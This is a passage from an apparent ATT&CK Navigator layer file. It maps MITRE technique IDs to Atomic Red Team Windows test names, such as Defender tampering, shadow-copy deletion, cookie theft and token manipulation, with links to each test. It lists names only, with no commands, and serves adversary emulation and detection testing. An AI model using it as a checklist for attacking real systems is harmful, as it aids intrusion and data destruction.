Changes - Powershell\n- Disable Windows Registry Tool\n- Disable Windows CMD application\n- Disable Windows Task Manager application\n- Disable Windows Notification Center\n- Disable Windows Shutdown Button\n- Disable Windows LogOff Button\n- Disable Windows Change Password Feature\n- Disable Windows Lock Workstation Feature\n- Activate Windows NoDesktop Group Policy Feature\n- Activate Windows NoRun Group Policy Feature\n- Activate Windows NoFind Group Policy Feature\n- Activate Windows NoControlPanel Group Policy Feature\n- Activate Windows NoFileMenu Group Policy Feature\n- Activate Windows NoClose Group Policy Feature\n- Activate Windows NoSetTaskbar Group Policy Feature\n- Activate Windows NoTrayContextMenu Group Policy Feature\n- Activate Windows NoPropertiesMyDocuments Group Policy Feature\n- Hide Windows Clock Group Policy Feature\n- Windows HideSCAHealth Group Policy Feature\n- Windows HideSCANetwork Group Policy Feature\n- Windows HideSCAPower Group Policy Feature\n- Windows HideSCAVolume Group Policy Feature\n- Windows Modify Show Compress Color And Info Tip Registry\n- Windows Powershell Logging Disabled\n- Windows Add Registry Value to Load Service in Safe Mode without Network\n- Windows Add Registry Value to Load Service in Safe Mode with Network\n- Disable Windows Toast Notifications\n- Disable Windows Security Center Notifications\n- Suppress Win Defender Notifications\n- Allow RDP Remote Assistance Feature\n- NetWire RAT Registry Key Creation\n- Ursnif Malware Registry Key Creation\n- Terminal Server Client Connection History Cleared\n- Disable Windows Error Reporting Settings\n- DisallowRun Execution Of Certain Applications\n- Enabling Restricted Admin Mode via Command_Prompt\n- Mimic Ransomware - Enable Multiple User Sessions\n- Mimic Ransomware - Allow Multiple RDP Sessions per User\n- Event Viewer Registry Modification - Redirection URL\n- Event Viewer Registry Modification - Redirection Program\n- Enabling Remote Desktop Protocol via Remote 
Registry\n- Disable Win Defender Notification\n- Disable Windows OS Auto Update\n- Disable Windows Auto Reboot for current logon user\n- Windows Auto Update Option to Notify before download\n- Do Not Connect To Win Update\n- Tamper Win Defender Protection\n- Snake Malware Registry Blob\n- Allow Simultaneous Download Registry\n- Modify Internet Zone Protocol Defaults in Current User Registry - cmd\n- Modify Internet Zone Protocol Defaults in Current User Registry - PowerShell\n- Activities To Disable Secondary Authentication Detected By Modified Registry Value.\n- Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value.\n- Scarab Ransomware Defense Evasion Activities\n- Disable Remote Desktop Anti-Alias Setting Through Registry\n- Disable Remote Desktop Security Settings Through Registry\n- Disabling ShowUI Settings of Windows Error Reporting (WER)\n- Enable Proxy Settings\n- Set-Up Proxy Server\n- RDP Authentication Level Override\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":2,"enabled":true,"comment":"\n- Windows Screencapture\n- Windows Screen Capture (CopyFromScreen)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.001","score":1,"enabled":true,"comment":"\n- Email Collection with PowerShell Get-Inbox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1115","score":3,"enabled":true,"comment":"\n- Utilize Clipboard to store or execute commands from\n- Execute Commands from Clipboard using PowerShell\n- Collect Clipboard Data 
via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":4,"enabled":true,"comment":"\n- Automated Collection Command Prompt\n- Automated Collection PowerShell\n- Recon information for export with PowerShell\n- Recon information for export with Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":2,"enabled":true,"comment":"\n- Win32_PnPEntity Hardware Inventory\n- WinPwn - printercheck\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":2,"enabled":true,"comment":"\n- using device audio capture commandlet\n- Registry artefact when application use microphone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":4,"enabled":true,"comment":"\n- System Time Discovery\n- System Time Discovery - PowerShell\n- System Time Discovery W32tm as a Delay\n- System Time with Windows time Command\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":1,"enabled":true,"comment":"\n- Registry artefact when application use webcam\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md"}],"comment":"\n- Lolbin Jsc.exe compile javascript to exe\n- Lolbin Jsc.exe compile javascript to dll\n"},{"techniqueID":"T1127.001","score":2,"enabled":true,"comment":"\n- MSBuild Bypass Using Inline Tasks (C#)\n- MSBuild 
Bypass Using Inline Tasks (VB)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1129","score":1,"enabled":true,"comment":"\n- ESXi - Install a custom VIB on an ESXi host\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1129/T1129.md"}]},{"techniqueID":"T1132","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":1,"enabled":true,"comment":"\n- XOR Encoded data.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":1,"enabled":true,"comment":"\n- Running Chrome VPN Extensions via the Registry 2 vpn extension\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134/T1134.md"}]},{"techniqueID":"T1134.001","score":4,"enabled":true,"comment":"\n- Named pipe client impersonation\n- `SeDebugPrivilege` token duplication\n- Launch NSudo Executable\n- Bad Potato\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":2,"enabled":true,"comment":"\n- Access Token Manipulation\n- WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":5,"enabled":true,"comment":"\n- Parent PID Spoofing using PowerShell\n- Parent PID Spoofing - Spawn from Current 
Process\n- Parent PID Spoofing - Spawn from Specified Process\n- Parent PID Spoofing - Spawn from svchost.exe\n- Parent PID Spoofing - Spawn from New Process\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134.005","score":1,"enabled":true,"comment":"\n- Injection SID-History with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.005/T1134.005.md"}]},{"techniqueID":"T1135","score":7,"enabled":true,"comment":"\n- Network Share Discovery command prompt\n- Network Share Discovery PowerShell\n- View available share drives\n- Share Discovery with PowerView\n- PowerView ShareFinder\n- WinPwn - shareenumeration\n- Network Share Discovery via dir command\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":4,"enabled":true,"comment":"\n- Create a new user in a command prompt\n- Create a new user in PowerShell\n- Create a new Windows admin user\n- Create a new Windows admin user via .NET\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":3,"enabled":true,"comment":"\n- Create a new Windows domain admin user\n- Create a new account similar to ANONYMOUS LOGON\n- Create a new Domain Account using PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1137","score":9,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}],"comment":"\n- Office Application Startup - Outlook as a C2\n"},{"techniqueID":"T1137.001","score":1,"enabled":true,"comment":"\n- Injecting a Macro into the Word Normal.dotm Template for Persistence via PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.001/T1137.001.md"}]},{"techniqueID":"T1137.002","score":1,"enabled":true,"comment":"\n- Office Application Startup Test Persistence (HKCU)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":1,"enabled":true,"comment":"\n- Install Outlook Home Page Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":5,"enabled":true,"comment":"\n- Code Executed Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Word Add-in File (WLL)\n- Persistent Code Execution Via Excel VBA Add-in File (XLAM)\n- Persistent Code Execution Via PowerPoint VBA Add-in File (PPAM)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1140","score":2,"enabled":true,"comment":"\n- Deobfuscate/Decode Files Or Information\n- Certutil Rename and Decode\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":5,"enabled":true,"comment":"\n- Chrome/Chromium (Developer Mode)\n- Chrome/Chromium (Chrome Web Store)\n- Firefox\n- Edge Chromium Addon - VPN\n- Google Chrome Load Unpacked Extension With Command Line\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":2,"enabled":true,"comment":"\n- PetitPotam\n- WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"comment":"\n- Octopus Scanner Malware Open Source Supply Chain\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1197","score":4,"enabled":true,"comment":"\n- Bitsadmin Download (cmd)\n- Bitsadmin Download (PowerShell)\n- Persist, Download, & Execute\n- Bits download using desktopimgdownldr.exe (cmd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":5,"enabled":true,"comment":"\n- Examine local password policy - Windows\n- Examine domain password policy - Windows\n- Get-DomainPolicy with PowerView\n- Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy\n- Use of SecEdit.exe to export the local security policy (including the password policy)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":3,"enabled":true,"comment":"\n- Indirect Command Execution - pcalua.exe\n- Indirect Command Execution - forfiles.exe\n- Indirect Command Execution - conhost.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204/T1204.md"}]},{"techniqueID":"T1204.002","score":11,"enabled":true,"comment":"\n- 
OSTap Style Macro Execution\n- OSTap Payload Download\n- Maldoc choice flags command execution\n- OSTAP JS version\n- Office launching .bat file from AppData\n- Excel 4 Macro\n- Headless Chrome code execution via VBA\n- Potentially Unwanted Applications (PUA)\n- Office Generic Payload Download\n- LNK Payload Download\n- Mirror Blast Emulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204.003","score":1,"enabled":true,"comment":"\n- Malicious Execution from Mounted ISO Image\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.003/T1204.003.md"}]},{"techniqueID":"T1207","score":1,"enabled":true,"comment":"\n- DCShadow (Active Directory)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}],"comment":"\n- SyncAppvPublishingServer Signed Script PowerShell Command Execution\n- manage-bde.wsf Signed Script Command Execution\n"},{"techniqueID":"T1216.001","score":1,"enabled":true,"comment":"\n- PubPrn.vbs Signed Script Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1217","score":4,"enabled":true,"comment":"\n- List Google Chrome / Opera Bookmarks on Windows with powershell\n- List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt\n- List Mozilla Firefox bookmarks on Windows with command prompt\n- List Internet Explorer Bookmarks using the command prompt\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218","score":78,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}],"comment":"\n- mavinject - Inject DLL into running process\n- Register-CimProvider - Execute evil dll\n- InfDefaultInstall.exe .inf Execution\n- ProtocolHandler.exe Downloaded a Suspicious File\n- Microsoft.Workflow.Compiler.exe Payload Execution\n- Renamed Microsoft.Workflow.Compiler.exe Payload Executions\n- Invoke-ATHRemoteFXvGPUDisablementCommand base test\n- DiskShadow Command Execution\n- Load Arbitrary DLL via Wuauclt (Windows Update Client)\n- Lolbin Gpscript logon option\n- Lolbin Gpscript startup option\n- Lolbas ie4uinit.exe use as proxy\n- LOLBAS CustomShellHost to Spawn Process\n- Provlaunch.exe Executes Arbitrary Command via Registry Key\n- LOLBAS Msedge to Spawn Process\n"},{"techniqueID":"T1218.001","score":8,"enabled":true,"comment":"\n- Compiled HTML Help Local Payload\n- Compiled HTML Help Remote Payload\n- Invoke CHM with default Shortcut Command Execution\n- Invoke CHM with InfoTech Storage Protocol Handler\n- Invoke CHM Simulate Double click\n- Invoke CHM with Script Engine and Help Topic\n- Invoke CHM Shortcut Command with ITS and Help Topic\n- Decompile Local CHM File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":1,"enabled":true,"comment":"\n- Control Panel Items\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":2,"enabled":true,"comment":"\n- CMSTP Executing Remote Scriptlet\n- CMSTP Executing UAC Bypass\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":8,"enabled":true,"comment":"\n- CheckIfInstallable method call\n- InstallHelper method call\n- InstallUtil class constructor method call\n- InstallUtil Install method call\n- InstallUtil Uninstall method call - /U variant\n- InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant\n- InstallUtil HelpText method call\n- InstallUtil evasive invocation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":10,"enabled":true,"comment":"\n- Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject\n- Mshta executes VBScript to execute malicious command\n- Mshta Executes Remote HTML Application (HTA)\n- Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement\n- Invoke HTML Application - Jscript Engine Simulating Double Click\n- Invoke HTML Application - Direct download from URI\n- Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler\n- Invoke HTML Application - JScript Engine with Inline Protocol Handler\n- Invoke HTML Application - Simulate Lateral Movement over UNC Path\n- Mshta used to Execute PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":11,"enabled":true,"comment":"\n- Msiexec.exe - Execute Local MSI file with embedded JScript\n- Msiexec.exe - Execute Local MSI file with embedded VBScript\n- Msiexec.exe - Execute Local MSI file with an embedded DLL\n- Msiexec.exe - Execute Local MSI file with an embedded EXE\n- WMI Win32_Product Class - Execute Local MSI file with embedded JScript\n- WMI Win32_Product Class - Execute Local MSI file with embedded VBScript\n- WMI Win32_Product 
Class - Execute Local MSI file with an embedded DLL\n- WMI Win32_Product Class - Execute Local MSI file with an embedded EXE\n- Msiexec.exe - Execute the DllRegisterServer function of a DLL\n- Msiexec.exe - Execute the DllUnregisterServer function of a DLL\n- Msiexec.exe - Execute Remote MSI file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":2,"enabled":true,"comment":"\n- Odbcconf.exe - Execute Arbitrary DLL\n- Odbcconf.exe - Load Response File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":2,"enabled":true,"comment":"\n- Regasm Uninstall Method Call Test\n- Regsvcs Uninstall Method Call Test\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":5,"enabled":true,"comment":"\n- Regsvr32 local COM scriptlet execution\n- Regsvr32 remote COM scriptlet execution\n- Regsvr32 local DLL execution\n- Regsvr32 Registering Non DLL\n- Regsvr32 Silent DLL Install Call DllRegisterServer\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":14,"enabled":true,"comment":"\n- Rundll32 execute JavaScript Remote Payload With GetObject\n- Rundll32 execute VBscript command\n- Rundll32 execute VBscript command using Ordinal number\n- Rundll32 advpack.dll Execution\n- Rundll32 ieadvpack.dll Execution\n- Rundll32 syssetup.dll Execution\n- Rundll32 setupapi.dll Execution\n- Execution of HTA and VBS Files using Rundll32 and URL.dll\n- Launches an executable using Rundll32 and pcwutl.dll\n- Execution of non-dll using rundll32.exe\n- Rundll32 with Ordinal Value\n- Rundll32 with Control_RunDLL\n- Rundll32 with 
desk.cpl\n- Running DLL with .init extension and function\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1219","score":11,"enabled":true,"comment":"\n- TeamViewer Files Detected Test on Windows\n- AnyDesk Files Detected Test on Windows\n- LogMeIn Files Detected Test on Windows\n- GoToAssist Files Detected Test on Windows\n- ScreenConnect Application Download and Install on Windows\n- Ammyy Admin Software Execution\n- RemotePC Software Execution\n- NetSupport - RAT Execution\n- UltraViewer - RAT Execution\n- UltraVNC Execution\n- MSP360 Connect Execution\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":4,"enabled":true,"comment":"\n- MSXSL Bypass using local files\n- MSXSL Bypass using remote files\n- WMIC bypass using local XSL file\n- WMIC bypass using remote XSL file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":1,"enabled":true,"comment":"\n- WINWORD Remote Template Injection\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.001","score":5,"enabled":true,"comment":"\n- Take ownership using takeown utility\n- cacls - Grant permission to specified user or group recursively\n- attrib - Remove read-only attribute\n- attrib - hide file\n- Grant Full Access to folder for Everyone - Ryuk Ransomware Style\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1482","score":8,"enabled":true,"comment":"\n- Windows - Discover domain trusts with dsquery\n- Windows - Discover domain trusts with nltest\n- Powershell enumerate domains and forests\n- Adfind - Enumerate Active Directory OUs\n- Adfind - Enumerate Active Directory Trusts\n- Get-DomainTrust with PowerView\n- Get-ForestTrust with PowerView\n- TruffleSnout - Listing AD Infrastructure\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.001","score":2,"enabled":true,"comment":"\n- LockBit Black - Modify Group policy settings -cmd\n- LockBit Black - Modify Group policy settings -Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.001/T1484.001.md"}]},{"techniqueID":"T1485","score":2,"enabled":true,"comment":"\n- Windows - Overwrite file with SysInternals SDelete\n- Overwrite deleted data on C drive\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":3,"enabled":true,"comment":"\n- PureLocker Ransom Note\n- Data Encrypted with GPG4Win\n- Data Encrypt Using DiskCryptor\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":3,"enabled":true,"comment":"\n- Windows - Stop service using Service Controller\n- Windows - Stop service using net.exe\n- Windows - Stop service by killing process\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":11,"enabled":true,"comment":"\n- Windows - Delete Volume Shadow Copies\n- Windows - Delete Volume Shadow Copies via WMI\n- Windows - wbadmin Delete Windows Backup Catalog\n- Windows - Disable Windows Recovery Console Repair\n- Windows - Delete Volume Shadow Copies via WMI with PowerShell\n- Windows - Delete Backup Files\n- Windows - wbadmin Delete systemstatebackup\n- Windows - Disable the SR scheduled task\n- Disable System Restore Through Registry\n- Windows - vssadmin Resize Shadowstorage Volume\n- Modify VSS Service Permissions\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491/T1491.md"}]},{"techniqueID":"T1491.001","score":2,"enabled":true,"comment":"\n- Replace Desktop Wallpaper\n- Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1497","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":2,"enabled":true,"comment":"\n- Detect Virtualization Environment (Windows)\n- Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1505","score":6,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505/T1505.md"}]},{"techniqueID":"T1505.002","score":1,"enabled":true,"comment":"\n- Install MS Exchange Transport Agent Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505.003","score":1,"enabled":true,"comment":"\n- Web Shell Written to Disk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1505.004","score":2,"enabled":true,"comment":"\n- Install IIS Module using AppCmd.exe\n- Install IIS Module using PowerShell Cmdlet New-WebGlobalModule\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.004/T1505.004.md"}]},{"techniqueID":"T1505.005","score":2,"enabled":true,"comment":"\n- Simulate Patching termsrv.dll\n- Modify Terminal Services DLL Path\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.005/T1505.005.md"}]},{"techniqueID":"T1518","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}],"comment":"\n- Find and Display Internet Explorer Browser Version\n- Applications Installed\n- WinPwn - Dotnetsearch\n- WinPwn - DotNet\n- WinPwn - powerSQL\n"},{"techniqueID":"T1518.001","score":7,"enabled":true,"comment":"\n- Security Software Discovery\n- Security Software Discovery - powershell\n- Security Software Discovery - Sysmon Service\n- Security Software Discovery - AV Discovery via WMI\n- Security Software Discovery - AV Discovery via Get-CimInstance and Get-WmiObject cmdlets\n- Security Software Discovery - Windows Defender Enumeration\n- Security Software Discovery - Windows Firewall Enumeration\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1529","score":3,"enabled":true,"comment":"\n- Shutdown System - Windows\n- Restart System - Windows\n- Logoff System - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1531","score":3,"enabled":true,"comment":"\n- Change User Password - Windows\n- Delete User - Windows\n- Remove Account From Domain Admin Group\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1539","score":2,"enabled":true,"comment":"\n- Steal Firefox Cookies (Windows)\n- Steal Chrome Cookies (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1539/T1539.md"}]},{"techniqueID":"T1543","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.003","score":6,"enabled":true,"comment":"\n- Modify Fax service to run PowerShell\n- Service Installation CMD\n- Service Installation PowerShell\n- TinyTurla backdoor service w64time\n- Remote Service Installation CMD\n- Modify Service to Run Arbitrary Binary (Powershell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1546","score":27,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}],"comment":"\n- Persistence with Custom AutodialDLL\n- HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)\n- HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation)\n- WMI Invoke-CimMethod Start 
